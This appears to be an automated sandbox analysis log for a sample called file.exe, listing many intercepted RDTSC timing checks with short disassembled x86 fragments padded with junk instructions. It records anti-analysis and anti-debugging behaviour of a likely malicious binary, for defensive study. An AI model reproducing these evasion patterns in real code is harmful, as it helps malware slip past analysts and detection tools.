              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3509 second address: 7D353E instructions: 0x00000000 rdtsc 0x00000002 js 00007F4F3CC87F8Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F4F3CC87F82h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4F3CC87F87h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2D5F second address: 7D2D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4F3C50B5E5h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2D80 second address: 7D2D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2D84 second address: 7D2D8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2D8A second address: 7D2D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2D8F second address: 7D2D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4F3C50B5D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2EDE second address: 7D2EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2EE4 second address: 7D2EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2EE9 second address: 7D2EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F4F3CC87F76h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2EF5 second address: 7D2EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3069 second address: 7D3071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3071 second address: 7D307B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4F3C50B5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D598F second address: 7D5993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5993 second address: 7D59A2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4F3C50B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push edi 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D551E second address: 7D5524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5524 second address: 7D5528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5528 second address: 7D553B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jno 00007F4F3CC87F76h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D553B second address: 7D5565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F4F3C50B5F2h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5565 second address: 7D557B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4F3CC87F76h 0x0000000a jmp 00007F4F3CC87F7Ch 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D927A second address: 7D9293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F4F3C50B5E0h 0x0000000c jmp 00007F4F3C50B5DAh 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D958B second address: 7D9591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9591 second address: 7D959F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F4F3C50B5D6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD959 second address: 7DD993 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4F3CC87F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jo 00007F4F3CC87F76h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 js 00007F4F3CC87F8Ch 0x0000001a jmp 00007F4F3CC87F84h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 jc 00007F4F3CC87F7Eh 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DCC25 second address: 7DCC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DCC29 second address: 7DCC60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F4F3CC87F7Eh 0x0000000f pop edx 0x00000010 pushad 0x00000011 push esi 0x00000012 js 00007F4F3CC87F76h 0x00000018 jmp 00007F4F3CC87F7Eh 0x0000001d pop esi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD1AE second address: 7DD1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD1B3 second address: 7DD1B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD1B8 second address: 7DD1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD1BE second address: 7DD1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4F3CC87F76h 0x0000000a popad 0x0000000b push esi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F4F3CC87F7Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4F3CC87F7Eh 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD1EF second address: 7DD1F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD4E3 second address: 7DD4EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD4EF second address: 7DD4F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD4F5 second address: 7DD50F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F3CC87F84h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD50F second address: 7DD513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1F00 second address: 7E1F1A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4F3CC87F76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F4F3CC87F7Bh 0x00000010 pop ecx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1F1A second address: 7E1F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1F20 second address: 7E1F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E21E7 second address: 7E21ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E21ED second address: 7E2203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F82h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E24CB second address: 7E24E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4F3C50B5DEh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E24E3 second address: 7E24F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F81h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E24F8 second address: 7E24FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2795 second address: 7E2799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA08E second address: 7EA0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007F4F3C50B5E1h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA410 second address: 7EA41A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA41A second address: 7EA41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA78B second address: 7EA795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4F3CC87F76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA795 second address: 7EA799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA799 second address: 7EA7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4F3CC87F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA7A5 second address: 7EA7AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA7AA second address: 7EA7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA7B9 second address: 7EA7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB040 second address: 7EB048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB048 second address: 7EB052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4F3C50B5D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB35D second address: 7EB366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB60A second address: 7EB60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB60E second address: 7EB631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4F3CC87F7Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4F3CC87F7Dh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB631 second address: 7EB635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0D2F second address: 7F0D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F00E8 second address: 7F0127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jng 00007F4F3C50B5D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F4F3C50B5E4h 0x00000018 jmp 00007F4F3C50B5E6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0127 second address: 7F013C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4F3CC87F76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F4F3CC87F76h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F013C second address: 7F0144 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0144 second address: 7F0153 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4F3CC87F7Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F02CB second address: 7F02DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F3C50B5DBh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F06F0 second address: 7F06F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F06F4 second address: 7F06FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F06FA second address: 7F0717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4F3CC87F85h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0717 second address: 7F0726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5DBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F09E4 second address: 7F09E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD84F second address: 7FD87A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4F3C50B5DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDB9B second address: 7FDBBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F4F3CC87F85h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDBBF second address: 7FDBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDBC3 second address: 7FDBC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDE2E second address: 7FDE3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4F3C50B5DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDF49 second address: 7FDF51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE399 second address: 7FE3AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4F3C50B5D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F4F3C50B5D6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF33C second address: 7FF352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F81h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF352 second address: 7FF3AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E5h 0x00000007 push ebx 0x00000008 jmp 00007F4F3C50B5DDh 0x0000000d jnl 00007F4F3C50B5D6h 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jc 00007F4F3C50B612h 0x0000001c jmp 00007F4F3C50B5E1h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F4F3C50B5E5h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD1C6 second address: 7FD1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD1CA second address: 7FD1CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD1CE second address: 7FD1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F4F3CC87F82h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD1DC second address: 7FD1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD1E2 second address: 7FD1E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816260 second address: 816264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8187EC second address: 8187F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8187F0 second address: 818800 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4F3C50B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818800 second address: 818804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818804 second address: 81883C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4F3C50B5E4h 0x0000000c jbe 00007F4F3C50B5D8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push edi 0x00000015 jmp 00007F4F3C50B5E2h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 818547 second address: 81856B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F4F3CC87F86h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F4F3CC87F76h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819EEE second address: 819F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F4F3C50B5E1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819F07 second address: 819F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819F11 second address: 819F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4F3C50B5D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819F1D second address: 819F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819F28 second address: 819F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819F2C second address: 819F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833468 second address: 833485 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4F3C50B5EFh 0x00000008 jmp 00007F4F3C50B5E3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833485 second address: 833492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007F4F3CC87F76h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83375B second address: 833761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833761 second address: 833769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8338E1 second address: 8338E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833A17 second address: 833A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
